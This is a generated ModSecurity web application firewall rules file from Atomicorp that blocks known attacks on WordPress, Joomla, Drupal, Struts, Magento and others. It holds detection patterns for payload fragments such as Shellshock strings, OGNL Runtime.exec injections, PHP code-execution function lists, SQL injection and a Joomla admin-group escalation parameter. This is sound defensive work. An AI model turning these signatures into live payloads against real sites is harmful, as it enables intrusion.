iniApp
/
modsecurity-waf
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
modsecurity-waf/nginx-waf/99_asl_jitp.conf

5129 lines
416 KiB
Plaintext
Raw Permalink Blame History

SecDefaultAction "log,deny,auditlog,phase:2,status:403"
SecRule REQUEST_FILENAME "/viewtopic\.php" "phase:2,id:95347,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:95348,t:none,pass,nolog,skipAfter:END_RULES_95348"
SecRule REQUEST_URI "(?:highlight.*(?:\'\.|\x2527|\x27)|include\.*get\[.*\]\|=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|(?:printf|system)\()" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390761,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
SecMarker END_RULES_95348
SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:95349,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390605,ctl:ruleRemovebyID=390603,ctl:ruleRemovebyID=390449"
SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:95350,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390605,ctl:ruleRemovebyID=390603"
SecRule REQUEST_FILENAME "/magento-1\.4/" "phase:2,id:95351,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390630"
SecRule REQUEST_FILENAME "/gestor/download\.php" "phase:2,id:95352,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=314001"
SecRule REQUEST_FILENAME "/admindau/" "phase:2,id:95353,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390630"
SecRule REQUEST_FILENAME "/uos\.cgi" "phase:2,id:95354,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390761"
SecRule REQUEST_FILENAME "/clientes/index\.php" "phase:2,id:95355,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
SecRule REQUEST_FILENAME "/clientshosting\.php" "phase:2,id:95356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:95357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393449"
SecRule REQUEST_FILENAME "/members/login\.php" "phase:2,id:95358,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,id:95359,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390439"
SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95360,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=303669"
SecRule REQUEST_FILENAME "/previewemail\.php" "phase:2,id:95361,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=381239"
SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:95362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95363,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:95364,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
SecRule REQUEST_FILENAME "/sendy/includes/list/edit\.php" "phase:2,id:95365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
# http://www.atomicorp.com/
# Atomicorp (Gotroot.com) ModSecurity rules
# Virtual Just In Time Patches for Vulnerable Applications Rules
# for modsec 2.9.3 and up
#
# Copyright 2005-2024 by Atomicorp, Inc., all rights reserved.
# Redistribution is strictly prohibited in any form, including whole or in part.
# Distribution of this work or derivative of this work in any form is
# prohibited unless prior written permission is obtained from the
# copyright holder.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS and CONTRIBUTORS AS IS
# and ANY EXPRESS or IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY and FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER or CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, or
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS or SERVICES; LOSS OF USE, DATA, or PROFITS; or BUSINESS
# INTERRUPTION) HOWEVER CAUSED and ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, or TORT (INCLUDING NEGLIGENCE or OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
#---ASL-CONFIG-FILE---
# Do not edit this file!
# This file is generated and changes will be overwritten.
#
# If you need to make changes to the rules, please follow the procedure here:
# http://www.atomicorp.com/wiki/index.php/Mod_security
#--------------------------------
# notes
#--------------------------------
#--------------------------------
#start rules
#--------------------------------
# Phase 2 rules
#
#Bash attacks
SecRule REQUEST_HEADERS|FILES_NAMES|ARGS|ARGS_NAMES|!ARGS:/msg/|!ARGS:/message/|!ARGS:/txt/|!ARGS:/text/ "^ ?\( ?\) ?{" "phase:1,deny,id:330701,rev:3,severity:1,t:none,t:urlDecodeUni,t:compressWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2014-6271 Bash Attack'"
SecRule REQUEST_LINE "^ ?\( ?\) ?{" "phase:1,deny,id:330702,rev:3,severity:1,t:none,t:compressWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2014-6271 Bash Attack'"
#moved from embargoed rules Nov15 2024
SecRule REQUEST_URI "/wp-json/reallysimplessl/v1/two_fa/skip_onboarding" "id:331704,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules: Really Simple SSL authentication bypass attack',severity:1,rev:12,log,auditlog,chain"
SecRule &ARGS:user_id "@ge 1" "t:none,chain"
SecRule &ARGS:login_nonce "@ge 1" "t:none,chain"
SecRule &ARGS:redirect_to "@ge 1" "t:none"
#Moved from embargoed rules Jan 3 2022
SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:email_text|!ARGS:/message/|!ARGS:FormLayout|!ARGS:/svg/|!ARGS:/template/|!ARGS:/translate/|!ARGS:mepr-emails|!ARGS:wcf_email_body|!ARGS:/content/ "@rx [\"'`][\[\{].*[\]\}][\"'`].*(::.*jsonb?)?.*(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)|(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)[\"'`][\[\{].*[\]\}][\"'`]|json_extract.*\(.*\)" "id:331702,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,t:removeWhitespace,msg:'Atomicorp.com WAF Rules: Possible JSON-Based SQL Injection',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:1,rev:12,log,auditlog"
#/editBlackAndWhiteList
SecRule REQUEST_URI "editBlackAndWhiteList" "id:394669,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE attempt blocked',rev:1,severity:2"
#Known malware sign1
SecRule ARGS_NAMES "^(?:e44e|wowex)$" "phase:2,deny,status:403,id:334071,rev:2,severity:1,t:none,t:compressWhiteSpace,t:lowercase,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Known PHP code injection Attack'"
#Known malware sign1
#SecRule ARGS_NAMES "miglaa_update_(?:me|arr|barinfo)"
#SecRule ARGS_NAMES "miglaa_(?:update|stripe|sync)_"
SecRule ARGS_NAMES|ARGS:action "miglaa?_" "phase:2,deny,status:403,id:334072,rev:5,severity:1,t:none,t:urlDecodeUni,t:lowercase,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2019-6703 Attack blocked'"
#vulnerability scanner
SecRule ARGS "\'\|\|\'" "phase:2,deny,status:403,id:334073,rev:1,severity:1,t:none,t:urlDecodeUni,t:removewhitespace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Injection Attack blocked'"
#CryptoPHP
SecRule REQUEST_METHOD "@streq POST" "chain,id:394667,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt',rev:1,severity:2"
SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?serverkey" "t:none,t:lowercase,t:compressWhiteSpace,chain"
SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?data" "t:none,t:lowercase,t:compressWhiteSpace,chain"
SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?key" "t:none,t:lowercase,t:compressWhiteSpace,chain"
SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
SecRule REQUEST_METHOD "@streq POST" "chain,id:394666,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt',rev:1,severity:2"
SecRule &REQUEST_HEADERS:serverKey "@eq 1" "t:none,chain"
SecRule &REQUEST_HEADERS:data "@eq 1" "t:none,chain"
SecRule &REQUEST_HEADERS:key "@eq 1" "t:none,chain"
SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
SecRule REQUEST_URI "@pm .bat .cmd" "id:357876,phase:2,t:none,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:359931,t:none,pass,nolog,noauditlog,skipAfter:END_RFD"
#RFD attacks
SecRule REQUEST_URI "@rx (?i:^[^?]*\.(?:bat|cmd)(?: |$))" "phase:2,id:312863,t:none,t:urlDecodeUni,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Potential Reflected File Download (RFD) Attack.'"
SecMarker END_RFD
#Struts RCE attack
SecRule REQUEST_URI|ARGS|XML:/*|REQUEST_HEADERS:Content-Type "@pm inputstream ognl sun.misc opensymphony beanmap utility.execute allowstaticmethodaccess memberaccess cmd getparameter runtime unmarshaller java base64 org.apache.tomcat" "phase:2,id:368829,t:none,t:urlDecodeUni,multimatch,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:361112,t:none,pass,nolog,noauditlog,skipAfter:END_STRUTS"
#CVE-2020-17530
SecRule REQUEST_URI "\.action" "chain,phase:2,status:403,deny,log,auditlog,id:339207,rev:1,severity:2,t:none,t:urlDecodeUni,t:lowercase,multimatch,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts CVE-2020-17530 RCE attack blocked'"
SecRule ARGS|XML:/* "(?:collections\.beanmap|template\.utility\.execute)" "t:none,t:urlDecodeUni,t:lowercase,multimatch"
#java.lang.Runtime@getRuntime().exec
SecRule REQUEST_URI "\.action" "chain,phase:2,status:403,deny,log,auditlog,id:337207,rev:4,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java RCE attack blocked'"
SecRule ARGS|XML:/* "(?:java\.lang\.runtime@getruntime\(\)\.exec\(|com\.opensymphony\.xwork)" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS|XML:/* "(?:sun\.misc\.base64decoder|unmarshaller\.base64data|java.lang.runtime.{1,200}exec\()" "chain,phase:2,status:403,deny,log,auditlog,id:337206,rev:8,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
SecRule ARGS|XML:/* "javax?\.(?:io\.fileoutputstream|imageio\.spi\.|lang\.processbuilder)" "t:none,t:lowercase,t:urlDecodeUni"
SecRule ARGS|XML:/* "\${\(\#_memberaccess\[\"allowstaticmethodaccess" "phase:2,status:403,deny,log,auditlog,id:337208,rev:6,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
SecRule ARGS|XML:/* "(?:java\.lang\.runtime.{1,200}exec\(|request\.getparameter\(\"cmd\")" "phase:2,status:403,deny,log,auditlog,id:337210,rev:8,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java RCE attack blocked'"
SecRule ARGS|XML:/*|REQUEST_HEADERS:Content-Type "\)\.\(#cmd=\'" "phase:2,status:403,deny,log,auditlog,id:337218,rev:1,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removewhitespace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
SecRule REQUEST_URI|ARGS|XML:/* "java\.(?:lang|util)" "chain,phase:2,status:403,deny,log,auditlog,id:337211,rev:4,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134) blocked'"
SecRule REQUEST_URI|ARGS|XML:/* "(?:getinputstream|getruntime\(\)\.exec)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
#Generic java code injection
SecRule REQUEST_URI|ARGS|XML:/* "javax?\.(?:lang|util|script)" "chain,phase:2,status:403,deny,log,auditlog,id:337209,rev:5,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java remote code injection blocked'"
SecRule REQUEST_URI|ARGS|XML:/* "(?:p\.command\((\'cmd|[cbd]?a?sh)|base64\.decoder\(\)\.decode|getinputstream|getruntime\(\)\.exec\(|processbuilder\(\)\.command|nio\.file\.files)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removewhitespace"
SecMarker END_STRUTS
#RCE Joomla rule not needed
#Only added to give more information to the threat intelligence system that this was specifically a Joomla RCE attack
#Rule 347195 already protected against this vulnerability
SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS:filter-search "(?:drivermysql|jfactory|databasedriver|(}_|^\:))" "phase:2,status:403,deny,log,auditlog,id:337106,rev:2,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla RCE attack blocked'"
SecRule REQUEST_HEADERS:Referer "^{_.*(?:databasedriver|drivermysql|jfactory)" "phase:2,status:403,deny,log,auditlog,id:337107,rev:2,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla RCE attack blocked'"
#Moved to JITP rules from generic rules to trigger after 337106 so the TI can see specific cases of joomla only RCE attacks
SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR "@pm php chr fopen fwrite globals system passthru serialize include php_uname popen proc_open mysql_query exec eval proc_nice proc_terminate proc_get_status proc_close pfsockopen leak apache_child_terminate posix_kill posix_mkfifo posix_setpgid posix_setsid posix_setuid phpinfo preg_ decode_base64 base64_decode base64_url_decode rot13 <? mfunc mclude dynamic-cached-content" "phase:2,id:337829,t:none,t:urlDecodeUni,t:removeComments,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:391023,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_UA_1"
SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|base64_decode|decode_base64|rot13|base64_url_decode)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$))" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:347195,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP function in HTTP header attack blocked'"
SecMarker END_PHP_CODE_INJECTION_ATTACKS_UA_1
#wp-json/mpp-v2/get_users
#user_pass
SecRule REQUEST_URI "wp-json/mpp/v2/" "chain,deny,log,auditlog,phase:4,t:none,t:urlDecodeUni,t:lowercase,ctl:auditLogParts=+E,auditlog,severity:'2',rev:1,status:404,msg:'Atomicorp.com WAF Rules: User Profile Picture Plugin Leak Prevented',id:'380115'"
SecRule RESPONSE_BODY "user_pass" "t:none"
SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df|s)|gif|js|css|ico|avi|w(?:mv|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333863,skipAfter:END_JITP"
SecRule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:373863,skipAfter:END_JITP_SPECIAL"
#big-ip
SecRule REQUEST_URI "/mgmt/tm/util" "id:392767,phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible BIG_IP attack',rev:2,severity:1"
#X3CSCRIPT SRC
#not really necessary but some poorly written vulnerability scanners think this works
SecRule REQUEST_URI|ARGS "X3C ?SCRIPT SRC" "id:392765,phase:2,t:none,t:removecomments,t:compressWhiteSpace,deny,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Naive Java application cross scripting attack ',rev:2,severity:2"
#?gf_page=upload
#file_name *php*
SecRule REQUEST_URI "\?gf_page=upload" "chain,id:393664,phase:2,t:none,t:lowercase,deny,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Gravity Forms upload attack',rev:2,severity:2"
SecRule ARGS:file_name "\.(?:p(?:hp|html)|txt)" "t:none,t:lowercase"
SecRule REQUEST_FILENAME "/cmdownload/" "id:322292,phase:2,t:none,t:UrlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:327222,t:none,pass,nolog,noauditlog,skipAfter:END_CMDOWNLOAD"
#/cmdownloads/?CMDsearch=".
SecRule REQUEST_URI "/cmdownloads/\?cmdsearch=\"\." "id:393663,phase:2,t:none,t:UrlDecodeUni,t:lowercase,deny,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress CM Download Manager RCE attempt',rev:1,severity:2"
SecRule REQUEST_FILENAME "/cmdownload/add/" "chain,id:322272,rev:3,phase:2,t:none,t:UrlDecodeUni,t:normalizePath,t:lowercase,deny,status:403,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cmdownload XSS attack (CVE-2020-27344)',severity:2"
SecRule REQUEST_HEADERS:Content-Disposition "filename=\"[^\<]{0,32}\<" "t:none,t:UrlDecodeUni,t:lowercase"
SecMarker END_CMDOWNLOAD
SecRule REQUEST_URI "node" "chain,id:391235,deny,status:403,phase:2,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,t:compressWhiteSpace,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal pre-auth SQL injection attack',rev:8,severity:1"
SecRule ARGS|ARGS_NAMES|!ARGS:/^field_aut_content/ "(?:update {?users}? set|insert into {?users}?|concat ?\(|truncate table)"
# Legacy - SCRIPT_BASENAME is no longer supported
#SecRule SCRIPT_BASENAME "^(index\.php)?$" #"chain,id:391236,deny,status:403,phase:2,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,t:compressWhiteSpace,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal pre-auth SQL injection attack',rev:1,severity:1"
#SecRule ARGS:form_id "^user_login_block$" "chain,t:none,t:lowercase"
#SecRule ARGS_NAMES "^name\[" "t:none,t:lowercase"
#SecRule REQUEST_URI "node" #"chain,id:391234,deny,status:403,phase:2,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,t:compressWhiteSpace,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal pre-auth SQL injection attack',rev:4,severity:1"
#SecRule ARGS_NAMES "(?:update {?users}? set|insert into {?users}?|concat ?\(|trucate)"
SecRule REQUEST_HEADERS:Referer "@pm semalt.com savetubevideo.com srecorder.com kambasoft.com fbdownloader.com musicas-gratis.com for-website.com best-seo-solution.com social-buttons.com" "id:337876,phase:2,t:none,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:319931,t:none,pass,nolog,noauditlog,skipAfter:END_SEMALT"
SecRule REQUEST_HEADERS:Referer "(?:\.(?:s(?:emalt|avetubevideo|recorder)|kambasoft|fbdownloader)|-musicas-gratis|best-seo-solution|buttons?-for-websites?|social-buttons)\.com" "id:393766,phase:2,t:none,t:lowercase,deny,status:403,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: semalt.com bot attempt',rev:8,severity:3,tag:'no_ar'"
SecMarker END_SEMALT
#WP brute force DOS attack
#/?3162504=9747583
SecRule REQUEST_URI "/\?[0-9]{7}=[0-9]{7}" "phase:2,t:none,log,deny,auditlog,status:403,id:393669,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible DOS attack',t:none"
#Joomla zero day
SecRule ARGS:option "@streq com_media" "id:384545,severity:2,rev:1,phase:2,t:none,log,auditlog,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Media Manager File Upload Bypass Attack',tag:'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads',chain"
SecRule FILES_NAMES "@endsWith ."
#PHP code injection
#<!--mfunc
SecRule ARGS "< ?\!--{,100}.(?:m(?:func|clude)|dynamic-cached-content) " "phase:2,log,deny,auditlog,status:403,id:393665,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:Possible W3TC and WP Super Cache PHP Code injection attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
#Roundcube
#referrer: &_value=config/db.inc.php
SecRule REQUEST_HEADERS:REFERER "&_value=config/(?:db|main)\.inc\.php" "phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:378492,rev:7,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Roundcube LFI vulnerablity'"
#.stfi.re/ unauthorized proxing
SecRule REQUEST_HEADERS:REFERER "\.stfi\.re/" "phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:378497,rev:7,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Unauthorized Proxying of Website by .stfi.re'"
SecRule REQUEST_FILENAME "\.(?:pl|asp|exe|(?:tt|wof)f)$" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333864,skipAfter:END_PHP_CGI_BUG"
#Generic PHP CGI mode exploit
#Contact Form 7
SecRule REQUEST_URI "^/\?-s&_wpcf7_is_ajax_call" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:353864,skipAfter:END_PHP_CGI_BUG"
SecRule QUERY_STRING "^-a(?:ction=|dmin$)" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:354864,skipAfter:END_PHP_CGI_BUG"
SecRule QUERY_STRING "^-[abcdnrsw]" "phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:removeWhiteSpace,t:lowercase,id:378491,rev:6,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Attempt to Exploit PHP CGI command injection vulnerablity'"
SecRule QUERY_STRING "^(?:%2B|%2b|\+|\s|%20)+?(?:%2d|%2D|-)[abcdnrsw]" "phase:2,status:403,log,deny,auditlog,t:none,t:removeWhiteSpace,id:378371,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Attempt to Exploit PHP CGI command injection vulnerablity'"
SecMarker END_PHP_CGI_BUG
#ajax/api/hook/decodeArguments
SecRule REQUEST_URI "ajax/api/hook/decodearguments" "chain,phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:376476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: VBulleting Code Injection Attack Blocked'"
SecRule ARGS:arguments "(?:vb_db_result|vb_database|php)" "t:none,t:lowercase,t:removecomments"
#W3TC total cache exploit
SecRule REQUEST_URI "wp-content/w3tc/dbcache/" "phase:2,status:403,log,deny,auditlog,t:none,t:urlDecodeUni,t:removeWhiteSpace,t:lowercase,id:376416,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: W3 Total Cache vulnerablity'"
#Joomla
#jform[groups][]=7
#index.php?option=com_users&view=registration
#SecRule REQUEST_URI "index\.php"
SecRule ARGS:option "com_users" "phase:2,log,deny,auditlog,status:403,chain,id:392664,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Privilige Escalation Vulnerability',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:view "registration" "chain,t:none,t:lowercase"
SecRule ARGS:/^jform\[groups\]\[\]$/ "^7$"
SecRule REQUEST_URI "component/users/\?(?:task|view)=registration" "phase:2,log,deny,auditlog,status:403,chain,id:392665,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla Privilige Escalation Vulnerability',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:/^jform\[groups\]\[\]$/ "^7$"
#Phase 4 PHP rule
SecRule REQUEST_FILENAME "/wp-admin/setup-config\.php" "auditlog,chain,phase:4,t:none,t:lowercase,log,deny,auditlog,id:'381211',msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MySQL Server Username/Password Disclosure Vulnerability via \'setup-config.php\' page.',tag:'CVE-2011-4898'"
SecRule ARGS_GET:step "@streq 2" "chain"
SecRule RESPONSE_BODY "We were able to connect to the database server \(which means your username and password is okay\) but not able to select the database|This either means that the username and password information in your wp-config.php file is incorrect or we can't contact the database server at" "t:none"
#/index.php/admin/Cms_Wysiwyg/
SecRule REQUEST_URI "/cms_wysiwyg/directive/index/" "phase:2,t:none,t:urlDecodeUni,t:lowercase,log,deny,status:403,auditlog,id:336477,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Magento Shoplift attack'"
#/manager/?a=system.*file=;});alert(1); </script>
SecRule REQUEST_URI "/manager/\?a=system" "phase:2,t:none,t:urlDecodeUni,t:lowercase,log,deny,status:403,auditlog,id:336478,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ModX Revolution 2.3.5-pl Cross Site Scripting attack',chain"
SecRule ARGS:file "(?:script|\} ?\) ?\;)" "t:none,t:urlDecodeUni,t:lowercase"
#?gf_page=upload
SecRule REQUEST_URI "\?gf_page=upload" "chain,capture,phase:2,deny,log,auditlog,id:391742,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Gravity Forms 1.8.19 Shell Upload Attack'"
SecRule ARGS:name "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "\?gf_page=upload" "chain,capture,phase:2,deny,log,auditlog,id:391743,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Gravity Forms 1.8.19 Shell Upload Attack'"
SecRule ARGS:gform_unique_id "\.\./\.\." "t:none,t:urlDecodeUni,t:lowercase"
#WP 4.7 exploit
SecRule REQUEST_URI "/wp/v2/posts/" "chain,capture,phase:2,deny,log,auditlog,id:390751,rev:2,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API remote code injection attack',logdata:'%{TX.0}'"
SecRule ARGS:id "!(^[0-9]+$)" "t:none,t:urlDecodeUni"
#WP 4.7 exploit
SecRule REQUEST_URI "/wp/v2/posts/" "chain,capture,phase:2,deny,log,auditlog,id:390753,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API remote code injection attack',logdata:'%{TX.0}'"
SecRule ARGS:id "[a-z]" "t:none,t:urlDecodeUni,t:lowercase"
#/wp-json/wp/v2/posts/2549
#SecRule REQUEST_URI "/wp/v2/posts/[0-9]+" "chain,capture,phase:2,deny,log,auditlog,id:390752,rev:3,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API probe',logdata:'%{TX.0}'"
#SecRule REQUEST_METHOD "GET" "t:none"
#drupal JITPs
#moved from encrypted embargoed rules
